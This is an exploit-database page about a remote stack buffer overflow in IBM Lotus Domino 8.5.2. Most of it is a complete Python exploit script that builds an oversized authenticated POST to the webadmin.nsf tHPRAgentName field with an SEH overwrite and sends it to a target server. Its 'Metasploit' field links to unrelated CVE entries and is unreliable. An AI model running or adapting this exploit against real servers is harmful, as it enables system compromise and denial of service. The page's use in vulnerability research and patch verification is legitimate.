header-logo
Suggest Exploit
vendor:
Lotus Domino
by:
Author name not mentioned
9
CVSS
CRITICAL
Remote stack-based buffer overflow
119
CWE
Product Name: Lotus Domino
Affected Version From: Lotus Domino 8.5.2
Affected Version To: Other versions may also be affected
Patch Exists: NO
Related CWE: CVE not mentioned
CPE: a:ibm:lotus_domino:8.5.2
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-23499/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2022-3172/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/debian-cve-2021-37698/https://www.rapid7.com/db/vulnerabilities/suse-cve-2021-37698/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-25686/https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=2https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=3https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=2
Other Scripts:
Platforms Tested:
2011

Remote Stack-Based Buffer Overflow Vulnerability in IBM Lotus Domino

The vulnerability exists due to a failure in performing adequate boundary checks on user-supplied input. A remote attacker can exploit this vulnerability by sending a specially crafted request to the affected server, which could lead to the execution of arbitrary code with system-level privileges. Successful exploitation of this vulnerability would completely compromise the affected computers. Failed exploit attempts may result in a denial-of-service condition.

Mitigation:

It is recommended to apply the latest updates and patches provided by IBM to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49705/info

IBM Lotus Domino is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

Successfully exploiting this issue will allow remote attackers to execute arbitrary code with system-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial-of-service condition.

Lotus Domino 8.5.2 is vulnerable; other versions may also be affected. 

#!/usr/bin/python

import socket,struct,sys,os

host="192.168.x.y"					#server ip here!
cookie="1234567890abcdef"	                        #Set your Cookie credential here! Cookie = base64((usr:pwd))
#Shellcode = Using XOR [reg],reg to crash ("like" INT3 :))
Shellcode=chr(0x30)

server=host,80
SEH=struct.pack("<L",0x60404672)                       # POP ESI - POP EBP - RETN nnotes.dll.60404672
nSEH=struct.pack("<L",0x4141347A)                      # INC ecx  ;NOP 
                                                        # INC ecx  ;NOP
 							# JPE  slep ;Detour
vars="__Click=0&tHPRAgentName="                         #tHPRAgentName => Vulnerable POST variable
buf="A"*436                                             #sended buffer-nSEH-SEH
slep="X"*46                                             #pre-shellcode to fix JPE landing

#This function forges our POST request (with our Shellcode sure)
def buildPOST(h,b,c):				
	P="POST /webadmin.nsf/fmHttpPostRequest?OpenForm&Seq=1 HTTP/1.1\r\n"
	P+="Host: "+h+"\r\n"
	P+="User-Agent: oh sure\r\n"
	P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
	P+="Accept-Language: chinnese plz\r\n"
	P+="Accept-Encoding: gzip,deflate\r\n"
	P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
	P+="Keep-Alive: 115\r\n"
	P+="Connection: keep-alive\r\n"
	P+="Referer:  http://"+h+"/webadmin.nsf/dlgConfigPorts?ReadForm&objref=16\r\n"
	P+="Cookie: CWCweb=\"savedLocale:en\"\r\n"
	P+="Authorization: Basic "+c+"\r\n"
	P+="Content-Type: application/x-www-form-urlencoded\r\n"
	P+="Content-Length: %s\r\n" % str(len(b))
	P+="\r\n"
	P+=b
	return P

def main():
	if os.name=="nt":
		os.system("cls")
	else:
		os.system("clear")
	print"\t->[ IBM Lotus Domino 8.5.2 Remote Stack Overflow ]<-"
	print"\t        ->[Remote Code Execution Exploit]<-\n\n"
	print"[+] Crafting buffer..."
	#Creating POST content data
	buffer=vars+buf+nSEH+SEH+slep+Shellcode
	print"[+] Connecting to server..."
	s=socket.socket()
	#Trying connect to IBM Lotus Domino HTTP server
	try:
		s.connect(server)
	#We goin to exit if this fails
	except:
		print"[-] Error connecting to remote server..."
		sys.exit(0)
	print"[+] Crafting POST request..."
	#Crafting final POST
	post=buildPOST(host,buffer,cookie)
	print"[+] 0k, sending..."
	#Sending Shellcode to remote server
	s.send(post)
	#Server is running? Some fails :S
	try:
		print s.recv(2048)
		print"[x] Exploit failed!"
	#Else we achieve remote code execution successfully
	except:
		print"[+] Done!" 
	s.close()
	print"\n[*] By @rmallof"

if __name__=="__main__":
	main()

Navigation

Suggest Exploit

Services By CQR